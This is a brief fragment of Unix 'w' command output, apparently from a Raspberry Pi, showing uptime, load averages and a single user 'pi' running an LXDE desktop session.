MDT 2020 06:26:41 up 23 days, 17:45, 1 user, load average: 5.34, 3.60, 3.02 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Aug20 23days 1:37m 3.74s /usr/bin/lxsession -s LXDE-pi -e LXDE